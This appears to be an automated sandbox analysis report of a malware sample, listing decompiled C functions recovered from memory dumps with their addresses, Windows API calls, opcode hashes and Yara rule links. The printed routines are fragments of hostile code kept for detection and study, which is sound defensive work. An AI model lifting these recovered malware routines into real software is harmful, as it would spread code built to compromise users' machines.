                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 03037B30, Relevance: 6.1, APIs: 4, Instructions: 136COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 85%
                                                                                                            			E03037B30(signed int __eax, void* __eflags, intOrPtr _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				void _v156;
				void _v428;
				void* _t55;
				unsigned int _t56;
				signed int _t66;
				signed int _t74;
				void* _t76;
				signed int _t79;
				void* _t81;
				void* _t92;
				void* _t96;
				signed int* _t99;
				signed int _t101;
				signed int _t103;
				void* _t107;

				_t92 = _a12;
				_t101 = __eax;
				_t55 = E030347C4(_a16, _t92);
				_t79 = _t55;
				if(_t79 == 0) {
					L18:
					return _t55;
				}
				_t56 =  *(_t92 + _t79 * 4 - 4);
				_t81 = 0;
				_t96 = 0x20;
				if(_t56 == 0) {
					L4:
					_t97 = _t96 - _t81;
					_v12 = _t96 - _t81;
					E0303227C(_t79,  &_v428);
					 *((intOrPtr*)(_t107 + _t101 * 4 - 0x1a8)) = E03033C06(_t101,  &_v428, _a8, _t96 - _t81);
					E03033C06(_t79,  &_v156, _a12, _t97);
					_v8 =  *((intOrPtr*)(_t107 + _t79 * 4 - 0x9c));
					_t66 = E0303227C(_t101, 0x303d168);
					_t103 = _t101 - _t79;
					_a8 = _t103;
					if(_t103 < 0) {
						L17:
						E0303227C(_a16, _a4);
						E03033450(_t79,  &_v428, _a4, _t97);
						memset( &_v428, 0, 0x10c);
						_t55 = memset( &_v156, 0, 0x84);
						goto L18;
					}
					_t99 = _t107 + (_t103 + _t79) * 4 - 0x1a8;
					do {
						if(_v8 != 0xffffffff) {
							_push(1);
							_push(0);
							_push(0);
							_push( *_t99);
							L0303AED0();
							_t74 = _t66 +  *(_t99 - 4);
							asm("adc edx, esi");
							_push(0);
							_push(_v8 + 1);
							_push(_t92);
							_push(_t74);
							L0303AECA();
							if(_t92 > 0 || _t74 > 0xffffffff) {
								_t74 = _t74 | 0xffffffff;
								_v16 = _v16 & 0x00000000;
							}
						} else {
							_t74 =  *_t99;
						}
						_t106 = _t107 + _a8 * 4 - 0x1a8;
						_a12 = _t74;
						_t76 = E03032420(_t79,  &_v156, _t92, _t107 + _a8 * 4 - 0x1a8, _t107 + _a8 * 4 - 0x1a8, _t74);
						while(1) {
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							L13:
							_t92 =  &_v156;
							if(E03033F60(_t79, _t92, _t106) < 0) {
								break;
							}
							L14:
							_a12 = _a12 + 1;
							_t76 = E03032775(_t79,  &_v156, _t106, _t106);
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							goto L13;
						}
						_a8 = _a8 - 1;
						_t66 = _a12;
						_t99 = _t99 - 4;
						 *(0x303d168 + _a8 * 4) = _t66;
					} while (_a8 >= 0);
					_t97 = _v12;
					goto L17;
				}
				while(_t81 < _t96) {
					_t81 = _t81 + 1;
					_t56 = _t56 >> 1;
					if(_t56 != 0) {
						continue;
					}
					goto L4;
				}
				goto L4;
			}





















                                                                                                            0x03037b33
                                                                                                            0x03037b3f
                                                                                                            0x03037b45
                                                                                                            0x03037b4a
                                                                                                            0x03037b4e
                                                                                                            0x03037cc0
                                                                                                            0x03037cc4
                                                                                                            0x03037cc4
                                                                                                            0x03037b54
                                                                                                            0x03037b58
                                                                                                            0x03037b5c
                                                                                                            0x03037b5f
                                                                                                            0x03037b6a
                                                                                                            0x03037b70
                                                                                                            0x03037b75
                                                                                                            0x03037b78
                                                                                                            0x03037b92
                                                                                                            0x03037ba1
                                                                                                            0x03037bad
                                                                                                            0x03037bb7
                                                                                                            0x03037bbc
                                                                                                            0x03037bbe
                                                                                                            0x03037bc1
                                                                                                            0x03037c78
                                                                                                            0x03037c7e
                                                                                                            0x03037c8f
                                                                                                            0x03037ca2
                                                                                                            0x03037cb8
                                                                                                            0x00000000
                                                                                                            0x03037cbd
                                                                                                            0x03037bca
                                                                                                            0x03037bd1
                                                                                                            0x03037bd5
                                                                                                            0x03037bdb
                                                                                                            0x03037bdd
                                                                                                            0x03037bdf
                                                                                                            0x03037be1
                                                                                                            0x03037be3
                                                                                                            0x03037bed
                                                                                                            0x03037bf2
                                                                                                            0x03037bf4
                                                                                                            0x03037bf6
                                                                                                            0x03037bf7
                                                                                                            0x03037bf8
                                                                                                            0x03037bf9
                                                                                                            0x03037c00
                                                                                                            0x03037c07
                                                                                                            0x03037c0a
                                                                                                            0x03037c0a
                                                                                                            0x03037bd7
                                                                                                            0x03037bd7
                                                                                                            0x03037bd7
                                                                                                            0x03037c12
                                                                                                            0x03037c1a
                                                                                                            0x03037c26
                                                                                                            0x03037c2b
                                                                                                            0x03037c2b
                                                                                                            0x03037c30
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x03037c32
                                                                                                            0x03037c35
                                                                                                            0x03037c42
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x03037c44
                                                                                                            0x03037c44
                                                                                                            0x03037c51
                                                                                                            0x03037c2b
                                                                                                            0x03037c30
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x03037c30
                                                                                                            0x03037c5b
                                                                                                            0x03037c5e
                                                                                                            0x03037c61
                                                                                                            0x03037c68
                                                                                                            0x03037c68
                                                                                                            0x03037c75
                                                                                                            0x00000000
                                                                                                            0x03037c75
                                                                                                            0x03037b61
                                                                                                            0x03037b65
                                                                                                            0x03037b66
                                                                                                            0x03037b68
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x03037b68
                                                                                                            0x00000000

                                                                                                            APIs
                                                                                                            • _allmul.NTDLL(?,00000000,00000000,00000001), ref: 03037BE3
                                                                                                            • _aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 03037BF9
                                                                                                            • memset.NTDLL ref: 03037CA2
                                                                                                            • memset.NTDLL ref: 03037CB8
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.751417390.0000000003031000.00000020.00020000.sdmp, Offset: 03030000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.751377465.0000000003030000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000003.00000002.751473328.000000000303C000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000003.00000002.751508317.000000000303D000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000003.00000002.751528470.000000000303F000.00000002.00020000.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: memset$_allmul_aulldiv
                                                                                                            • String ID:
                                                                                                            • API String ID: 3041852380-0
                                                                                                            • Opcode ID: 65ba1a82ca474a9109edfd15e2b809026c5decb3c55a43cd10f1584cdef517e8
                                                                                                            • Instruction ID: dac86faedf1bbe35f5d8679473bbc70ff8a16c23ba3da9561fa7120fe9a31767
                                                                                                            • Opcode Fuzzy Hash: 65ba1a82ca474a9109edfd15e2b809026c5decb3c55a43cd10f1584cdef517e8
                                                                                                            • Instruction Fuzzy Hash: 18419375A02219AFDF10DF68CC80BDE77BDEF86710F104569F9099B280DB709A448B90
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 03037CC7, Relevance: 6.1, APIs: 4, Instructions: 96synchronizationCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 87%
                                                                                                            			E03037CC7(signed int _a4, signed int* _a8) {
				void* __ecx;
				void* __edi;
				signed int _t6;
				intOrPtr _t8;
				intOrPtr _t12;
				short* _t19;
				void* _t25;
				signed int* _t28;
				CHAR* _t30;
				long _t31;
				intOrPtr* _t32;

				_t6 =  *0x303d2a8; // 0xd448b889
				_t32 = _a4;
				_a4 = _t6 ^ 0x109a6410;
				_t8 =  *0x303d2e0; // 0x22da5a8
				_t3 = _t8 + 0x303e876; // 0x61636f4c
				_t25 = 0;
				_t30 = E03033CC2(_t3, 1);
				if(_t30 != 0) {
					_t25 = CreateEventA(0x303d2e4, 1, 0, _t30);
					E03034AAB(_t30);
				}
				_t12 =  *0x303d294; // 0x4000000a
				if(_t12 <= 5 || _t12 == 6 && _t12 >= 2 ||  *_t32 == 0 || E03034A03() != 0) {
					L12:
					_t28 = _a8;
					if(_t28 != 0) {
						 *_t28 =  *_t28 | 0x00000001;
					}
					_t31 = E03031000(_t32, 0);
					if(_t31 == 0 && _t25 != 0) {
						_t31 = WaitForSingleObject(_t25, 0x4e20);
					}
					if(_t28 != 0 && _t31 != 0) {
						 *_t28 =  *_t28 & 0xfffffffe;
					}
					goto L20;
				} else {
					_t19 =  *0x303d108( *_t32, 0x20);
					if(_t19 != 0) {
						 *_t19 = 0;
						_t19 = _t19 + 2;
					}
					_t31 = E03035AB2(0,  *_t32, _t19, 0);
					if(_t31 == 0) {
						if(_t25 == 0) {
							L22:
							return _t31;
						}
						_t31 = WaitForSingleObject(_t25, 0x4e20);
						if(_t31 == 0) {
							L20:
							if(_t25 != 0) {
								CloseHandle(_t25);
							}
							goto L22;
						}
					}
					goto L12;
				}
			}














                                                                                                            0x03037cc8
                                                                                                            0x03037ccf
                                                                                                            0x03037cd9
                                                                                                            0x03037cdd
                                                                                                            0x03037ce3
                                                                                                            0x03037cf2
                                                                                                            0x03037cf9
                                                                                                            0x03037cfd
                                                                                                            0x03037d0f
                                                                                                            0x03037d11
                                                                                                            0x03037d11
                                                                                                            0x03037d16
                                                                                                            0x03037d1d
                                                                                                            0x03037d74
                                                                                                            0x03037d74
                                                                                                            0x03037d7a
                                                                                                            0x03037d7c
                                                                                                            0x03037d7c
                                                                                                            0x03037d86
                                                                                                            0x03037d8a
                                                                                                            0x03037d9c
                                                                                                            0x03037d9c
                                                                                                            0x03037da0
                                                                                                            0x03037da6
                                                                                                            0x03037da6
                                                                                                            0x00000000
                                                                                                            0x03037d36
                                                                                                            0x03037d3b
                                                                                                            0x03037d43
                                                                                                            0x03037d47
                                                                                                            0x03037d4b
                                                                                                            0x03037d4b
                                                                                                            0x03037d58
                                                                                                            0x03037d5c
                                                                                                            0x03037d60
                                                                                                            0x03037db5
                                                                                                            0x03037dbb
                                                                                                            0x03037dbb
                                                                                                            0x03037d6e
                                                                                                            0x03037d72
                                                                                                            0x03037da9
                                                                                                            0x03037dab
                                                                                                            0x03037dae
                                                                                                            0x03037dae
                                                                                                            0x00000000
                                                                                                            0x03037dab
                                                                                                            0x03037d72
                                                                                                            0x00000000
                                                                                                            0x03037d5c

                                                                                                            APIs
                                                                                                              • Part of subcall function 03033CC2: lstrlen.KERNEL32(00000005,00000000,69B25F44,00000027,00000000,05319B38,00000000,?,?,69B25F44,00000005,0303D00C,?,?,0303539B), ref: 03033CF8
                                                                                                              • Part of subcall function 03033CC2: lstrcpy.KERNEL32(00000000,00000000), ref: 03033D1C
                                                                                                              • Part of subcall function 03033CC2: lstrcat.KERNEL32(00000000,00000000), ref: 03033D24
                                                                                                            • CreateEventA.KERNEL32(0303D2E4,00000001,00000000,00000000,61636F4C,00000001,00000000,00000001,?,00000000,?,030321B6,?,00000001,?), ref: 03037D08
                                                                                                              • Part of subcall function 03034AAB: RtlFreeHeap.NTDLL(00000000,00000000,03035012,00000000,?,?,00000000), ref: 03034AB7
                                                                                                            • WaitForSingleObject.KERNEL32(00000000,00004E20,030321B6,00000000,00000000,?,00000000,?,030321B6,?,00000001,?,?,?,?,0303555B), ref: 03037D68
                                                                                                            • WaitForSingleObject.KERNEL32(00000000,00004E20,61636F4C,00000001,00000000,00000001,?,00000000,?,030321B6,?,00000001,?), ref: 03037D96
                                                                                                            • CloseHandle.KERNEL32(00000000,61636F4C,00000001,00000000,00000001,?,00000000,?,030321B6,?,00000001,?,?,?,?,0303555B), ref: 03037DAE
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.751417390.0000000003031000.00000020.00020000.sdmp, Offset: 03030000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.751377465.0000000003030000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000003.00000002.751473328.000000000303C000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000003.00000002.751508317.000000000303D000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000003.00000002.751528470.000000000303F000.00000002.00020000.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: ObjectSingleWait$CloseCreateEventFreeHandleHeaplstrcatlstrcpylstrlen
                                                                                                            • String ID:
                                                                                                            • API String ID: 73268831-0
                                                                                                            • Opcode ID: c0f539caec4c2899ee51cf950f3c510f4c2cad1948f88087c28d6cad301992b0
                                                                                                            • Instruction ID: 663bd90b79d21860d9f82e2588d5c4d805a07a6e05675a39810721cb31f0188b
                                                                                                            • Opcode Fuzzy Hash: c0f539caec4c2899ee51cf950f3c510f4c2cad1948f88087c28d6cad301992b0
                                                                                                            • Instruction Fuzzy Hash: DE2128726037415BD7B1EE698C84ABBB3FDFF8AE10B090755F945EB104DB64C8018650
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 6F0502A0, Relevance: 6.1, APIs: 4, Instructions: 90COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.753041600.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: task
                                                                                                            • String ID:
                                                                                                            • API String ID: 1384045349-0
                                                                                                            • Opcode ID: 3a15674fe1360c87d04afa97441156d49c37df8709f9e57c413d792701f91831
                                                                                                            • Instruction ID: 2d0d78d5ca723a82be8ec1214a7b011d69785de88f297db904585521070fc0e0
                                                                                                            • Opcode Fuzzy Hash: 3a15674fe1360c87d04afa97441156d49c37df8709f9e57c413d792701f91831
                                                                                                            • Instruction Fuzzy Hash: B7412AB5D00258DFDB10CFA4C940BEDBBB4BB48318F1086ADE419A7281EB755A44CF50
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 03032107, Relevance: 6.1, APIs: 4, Instructions: 87sleepCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 40%
                                                                                                            			E03032107(void* __ecx, void* __eflags, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
				intOrPtr _v12;
				void* _v16;
				void* _v28;
				char _v32;
				void* __esi;
				void* _t29;
				void* _t38;
				signed int* _t39;
				void* _t40;

				_t36 = __ecx;
				_v32 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v12 = _a4;
				_t38 = E03033946(__ecx,  &_v32);
				if(_t38 != 0) {
					L12:
					_t39 = _a8;
					L13:
					if(_t39 != 0 && ( *_t39 & 0x00000001) == 0) {
						_t16 =  &(_t39[1]); // 0x5
						_t23 = _t16;
						if( *_t16 != 0) {
							E030365EA(_t23);
						}
					}
					return _t38;
				}
				if(E030337AC(0x40,  &_v16) != 0) {
					_v16 = 0;
				}
				_t40 = CreateEventA(0x303d2e4, 1, 0,  *0x303d384);
				if(_t40 != 0) {
					SetEvent(_t40);
					Sleep(0xbb8);
					CloseHandle(_t40);
				}
				_push( &_v32);
				if(_a12 == 0) {
					_t29 = E030324BE(_t36);
				} else {
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_t29 = E0303282B(_t36);
				}
				_t41 = _v16;
				_t38 = _t29;
				if(_v16 != 0) {
					E030351BB(_t41);
				}
				if(_t38 != 0) {
					goto L12;
				} else {
					_t39 = _a8;
					_t38 = E03037CC7( &_v32, _t39);
					goto L13;
				}
			}












                                                                                                            0x03032107
                                                                                                            0x03032114
                                                                                                            0x0303211a
                                                                                                            0x0303211b
                                                                                                            0x0303211c
                                                                                                            0x0303211d
                                                                                                            0x0303211e
                                                                                                            0x03032122
                                                                                                            0x0303212e
                                                                                                            0x03032132
                                                                                                            0x030321ba
                                                                                                            0x030321ba
                                                                                                            0x030321bd
                                                                                                            0x030321bf
                                                                                                            0x030321c7
                                                                                                            0x030321c7
                                                                                                            0x030321cd
                                                                                                            0x030321d0
                                                                                                            0x030321d0
                                                                                                            0x030321cd
                                                                                                            0x030321db
                                                                                                            0x030321db
                                                                                                            0x03032145
                                                                                                            0x03032147
                                                                                                            0x03032147
                                                                                                            0x0303215e
                                                                                                            0x03032162
                                                                                                            0x03032165
                                                                                                            0x03032170
                                                                                                            0x03032177
                                                                                                            0x03032177
                                                                                                            0x03032180
                                                                                                            0x03032184
                                                                                                            0x03032192
                                                                                                            0x03032186
                                                                                                            0x03032186
                                                                                                            0x03032187
                                                                                                            0x03032188
                                                                                                            0x03032189
                                                                                                            0x0303218a
                                                                                                            0x0303218b
                                                                                                            0x0303218b
                                                                                                            0x03032197
                                                                                                            0x0303219a
                                                                                                            0x0303219e
                                                                                                            0x030321a0
                                                                                                            0x030321a0
                                                                                                            0x030321a7
                                                                                                            0x00000000
                                                                                                            0x030321a9
                                                                                                            0x030321a9
                                                                                                            0x030321b6
                                                                                                            0x00000000
                                                                                                            0x030321b6

                                                                                                            APIs
                                                                                                            • CreateEventA.KERNEL32(0303D2E4,00000001,00000000,00000040,00000001,?,747DF710,00000000,747DF730,?,?,?,0303555B,?,00000001,?), ref: 03032158
                                                                                                            • SetEvent.KERNEL32(00000000,?,?,?,0303555B,?,00000001,?,00000002,?,?,030353C9,?), ref: 03032165
                                                                                                            • Sleep.KERNEL32(00000BB8,?,?,?,0303555B,?,00000001,?,00000002,?,?,030353C9,?), ref: 03032170
                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,0303555B,?,00000001,?,00000002,?,?,030353C9,?), ref: 03032177
                                                                                                              • Part of subcall function 030324BE: WaitForSingleObject.KERNEL32(00000000,?,?,?,03032197,?,03032197,?,?,?,?,?,03032197,?), ref: 03032598
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.751417390.0000000003031000.00000020.00020000.sdmp, Offset: 03030000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.751377465.0000000003030000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000003.00000002.751473328.000000000303C000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000003.00000002.751508317.000000000303D000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000003.00000002.751528470.000000000303F000.00000002.00020000.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: Event$CloseCreateHandleObjectSingleSleepWait
                                                                                                            • String ID:
                                                                                                            • API String ID: 2559942907-0
                                                                                                            • Opcode ID: 12fb5aa95307ab59e6c6fdc4056a613f7c6e215445785fbe8aadc41b8132194e
                                                                                                            • Instruction ID: 2e8b73a1e1a94e47c2bddbd6023b0f34815b838ebf07c8d534f964669b6b2dcf
                                                                                                            • Opcode Fuzzy Hash: 12fb5aa95307ab59e6c6fdc4056a613f7c6e215445785fbe8aadc41b8132194e
                                                                                                            • Instruction Fuzzy Hash: D721A477902219ABDB20FFE8C9C49EEB7BDEF5A350B054825EB11E7104D734D9458BA0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 6F0908CB, Relevance: 6.1, APIs: 4, Instructions: 77COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.753041600.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 20187fc068aa1d6eafe1208ce3af4e85800c3a5198542934036cc17ca26899b6
                                                                                                            • Instruction ID: a8d966861df632d730dbf183b2819ac0cc1416276cebc654d93da1d5f5b4266b
                                                                                                            • Opcode Fuzzy Hash: 20187fc068aa1d6eafe1208ce3af4e85800c3a5198542934036cc17ca26899b6
                                                                                                            • Instruction Fuzzy Hash: 5821B772A49625EBEB224A798C44B4E77E89F437B4F513211FD55AB281F630FD00E5E0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 030322D2, Relevance: 6.1, APIs: 4, Instructions: 76sleepstringCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 78%
                                                                                                            			E030322D2(intOrPtr* __eax, void** _a4, intOrPtr* _a8) {
				intOrPtr _v8;
				void* _v12;
				void* _v16;
				intOrPtr _t26;
				intOrPtr* _t28;
				intOrPtr _t31;
				intOrPtr* _t32;
				void* _t39;
				int _t46;
				intOrPtr* _t47;
				int _t48;

				_t47 = __eax;
				_push( &_v12);
				_push(__eax);
				_t39 = 0;
				_t46 = 0;
				_t26 =  *((intOrPtr*)( *__eax + 0x24))();
				_v8 = _t26;
				if(_t26 < 0) {
					L13:
					return _v8;
				}
				if(_v12 == 0) {
					Sleep(0xc8);
					_v8 =  *((intOrPtr*)( *_t47 + 0x24))(_t47,  &_v12);
				}
				if(_v8 >= _t39) {
					_t28 = _v12;
					if(_t28 != 0) {
						_t31 =  *((intOrPtr*)( *_t28 + 0x100))(_t28,  &_v16);
						_v8 = _t31;
						if(_t31 >= 0) {
							_t46 = lstrlenW(_v16);
							if(_t46 != 0) {
								_t46 = _t46 + 1;
								_t48 = _t46 + _t46;
								_t39 = E030375F6(_t48);
								if(_t39 == 0) {
									_v8 = 0x8007000e;
								} else {
									memcpy(_t39, _v16, _t48);
								}
								__imp__#6(_v16);
							}
						}
						_t32 = _v12;
						 *((intOrPtr*)( *_t32 + 8))(_t32);
					}
					 *_a4 = _t39;
					 *_a8 = _t46 + _t46;
				}
				goto L13;
			}














                                                                                                            0x030322de
                                                                                                            0x030322e2
                                                                                                            0x030322e3
                                                                                                            0x030322e4
                                                                                                            0x030322e6
                                                                                                            0x030322e8
                                                                                                            0x030322eb
                                                                                                            0x030322f0
                                                                                                            0x03032387
                                                                                                            0x0303238e
                                                                                                            0x0303238e
                                                                                                            0x030322f9
                                                                                                            0x03032300
                                                                                                            0x03032310
                                                                                                            0x03032310
                                                                                                            0x03032316
                                                                                                            0x03032318
                                                                                                            0x0303231d
                                                                                                            0x03032326
                                                                                                            0x0303232c
                                                                                                            0x03032331
                                                                                                            0x0303233c
                                                                                                            0x03032340
                                                                                                            0x03032342
                                                                                                            0x03032343
                                                                                                            0x0303234c
                                                                                                            0x03032350
                                                                                                            0x03032361
                                                                                                            0x03032352
                                                                                                            0x03032357
                                                                                                            0x0303235c
                                                                                                            0x0303236b
                                                                                                            0x0303236b
                                                                                                            0x03032340
                                                                                                            0x03032371
                                                                                                            0x03032377
                                                                                                            0x03032377
                                                                                                            0x03032380
                                                                                                            0x03032385
                                                                                                            0x03032385
                                                                                                            0x00000000

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.751417390.0000000003031000.00000020.00020000.sdmp, Offset: 03030000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.751377465.0000000003030000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000003.00000002.751473328.000000000303C000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000003.00000002.751508317.000000000303D000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000003.00000002.751528470.000000000303F000.00000002.00020000.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: FreeSleepStringlstrlenmemcpy
                                                                                                            • String ID:
                                                                                                            • API String ID: 1198164300-0
                                                                                                            • Opcode ID: ca616810cb78766bb07de54f82e526d47a1b472cdd5b3221b756d87a0c1b479c
                                                                                                            • Instruction ID: 6f82ec16922c49297f252ef8c70207dbe967e19d5e59043fedb1a8c612a3bd9f
                                                                                                            • Opcode Fuzzy Hash: ca616810cb78766bb07de54f82e526d47a1b472cdd5b3221b756d87a0c1b479c
                                                                                                            • Instruction Fuzzy Hash: 3C216079902209FFCB11DFA8C8849DEBBFCFF49200B144569E941E7200E730DA04CB51
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 6F08F299, Relevance: 6.1, APIs: 4, Instructions: 72COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GetLastError.KERNEL32(00000000,00000000,?,6F087CF9,?,?,00000003,?,6F051083,6F0510F4,?,6F050EE0,00000000,00000000,00000000,00000004), ref: 6F08F29E
                                                                                                            • _free.LIBCMT ref: 6F08F2FB
                                                                                                            • _free.LIBCMT ref: 6F08F331
                                                                                                            • SetLastError.KERNEL32(00000000,6F0DA1A0,000000FF,?,6F087CF9,?,?,00000003,?,6F051083,6F0510F4,?,6F050EE0,00000000,00000000,00000000), ref: 6F08F33C
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.753041600.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: ErrorLast_free
                                                                                                            • String ID:
                                                                                                            • API String ID: 2283115069-0
                                                                                                            • Opcode ID: b17d0e65e532aba36f15f605098d49146fb13c2326fa3e70311ce71eb5e2df46
                                                                                                            • Instruction ID: e7a97c44f1a1549d0ac0b7558e3954f24a32ed56941c58a1bdb6254c12d50cde
                                                                                                            • Opcode Fuzzy Hash: b17d0e65e532aba36f15f605098d49146fb13c2326fa3e70311ce71eb5e2df46
                                                                                                            • Instruction Fuzzy Hash: F711E97630AF026EDF1116749D84FAF339D9BC22BEB642225F5349B1C1FF219816A150
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 6F08F3F0, Relevance: 6.1, APIs: 4, Instructions: 69COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GetLastError.KERNEL32(?,?,?,6F078835,6F08F53A,?,?,6F04565E,000008BB,6F0DA0D4), ref: 6F08F3F5
                                                                                                            • _free.LIBCMT ref: 6F08F452
                                                                                                            • _free.LIBCMT ref: 6F08F488
                                                                                                            • SetLastError.KERNEL32(00000000,6F0DA1A0,000000FF,?,?,?,6F078835,6F08F53A,?,?,6F04565E,000008BB,6F0DA0D4), ref: 6F08F493
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.753041600.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: ErrorLast_free
                                                                                                            • String ID:
                                                                                                            • API String ID: 2283115069-0
                                                                                                            • Opcode ID: 248d955f71a801132fc3f5126a5b5ebd8414a16dd3941e3cc1b60f10ffa1f15f
                                                                                                            • Instruction ID: e40a6ca78ecbda4efc4bfb607370b5500c4b2238d107eb0c6ffcfd882e16a32a
                                                                                                            • Opcode Fuzzy Hash: 248d955f71a801132fc3f5126a5b5ebd8414a16dd3941e3cc1b60f10ffa1f15f
                                                                                                            • Instruction Fuzzy Hash: BA11087630AB012EEF1116788C80F6F379DABC627AB643236F938871D1FF709815A160
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 6F04F800, Relevance: 6.1, APIs: 4, Instructions: 67COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                              • Part of subcall function 6F0502A0: task.LIBCPMTD ref: 6F05039A
                                                                                                              • Part of subcall function 6F0502A0: task.LIBCPMTD ref: 6F0503A6
                                                                                                              • Part of subcall function 6F0502A0: task.LIBCPMTD ref: 6F0503B2
                                                                                                              • Part of subcall function 6F0502A0: task.LIBCPMTD ref: 6F0503C1
                                                                                                            • task.LIBCPMTD ref: 6F04F87F
                                                                                                            • task.LIBCPMTD ref: 6F04F88B
                                                                                                            • Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error.LIBCMTD ref: 6F04F8A0
                                                                                                            • task.LIBCPMTD ref: 6F04F8B8
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.753041600.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: task$Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error
                                                                                                            • String ID:
                                                                                                            • API String ID: 2520070614-0
                                                                                                            • Opcode ID: 74c0039afd9be9bfa277b7155dd36234673c2a6c548d30854eb7c63d77806f22
                                                                                                            • Instruction ID: bf56e73db4866b691eb5a8ccfe326f073bd6e53e3ab3b285d7326b4ee54391d8
                                                                                                            • Opcode Fuzzy Hash: 74c0039afd9be9bfa277b7155dd36234673c2a6c548d30854eb7c63d77806f22
                                                                                                            • Instruction Fuzzy Hash: F121FAB1D0024CEBCB04DFE4C950BDEBBB9FB48318F148169E519AB294DB346A05CB54
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 6F04F8E0, Relevance: 6.1, APIs: 4, Instructions: 67COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                              • Part of subcall function 6F0502A0: task.LIBCPMTD ref: 6F05039A
                                                                                                              • Part of subcall function 6F0502A0: task.LIBCPMTD ref: 6F0503A6
                                                                                                              • Part of subcall function 6F0502A0: task.LIBCPMTD ref: 6F0503B2
                                                                                                              • Part of subcall function 6F0502A0: task.LIBCPMTD ref: 6F0503C1
                                                                                                            • task.LIBCPMTD ref: 6F04F95F
                                                                                                            • task.LIBCPMTD ref: 6F04F96B
                                                                                                            • Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error.LIBCMTD ref: 6F04F980
                                                                                                            • task.LIBCPMTD ref: 6F04F998
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.753041600.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: task$Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error
